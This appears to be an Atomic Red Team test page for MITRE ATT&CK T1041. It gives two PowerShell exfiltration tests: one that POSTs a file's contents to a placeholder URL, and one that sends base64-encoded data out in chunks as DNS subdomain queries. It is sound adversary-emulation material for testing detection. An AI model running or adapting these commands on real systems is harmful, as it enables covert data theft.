# T1041 - Exfiltration Over C2 Channel
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1041)
<blockquote>

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - C2 Data Exfiltration](#atomic-test-1---c2-data-exfiltration)

- [Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains](#atomic-test-2---text-based-data-exfiltration-using-dns-subdomains)


<br/>

## Atomic Test #1 - C2 Data Exfiltration
Exfiltrates a file present on the victim machine to the C2 server.

**Supported Platforms:** Windows


**auto_generated_guid:** d1253f6e-c29b-49dc-b466-2147a6191932





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_url | Destination URL to post encoded data. | string | example.com|
| filepath | The file which is being exfiltrated to the C2 Server. | path | $env:TEMP&#92;LineNumbers.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
```






<br/>
<br/>

## Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains
Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.

**Supported Platforms:** Windows


**auto_generated_guid:** c9207f3e-213d-4cc7-ad2a-7697a7237df9





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dns_server | DNS server IP address or domain name. | url | dns.example.com|
| exfiltrated_data | Data to be exfiltrated. | string | SecretDataToExfiltrate|
| chunk_size | Size of each DNS query chunk (in characters). | integer | 63|


#### Attack Commands: Run with `powershell`! 


```powershell
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}
```






<br/>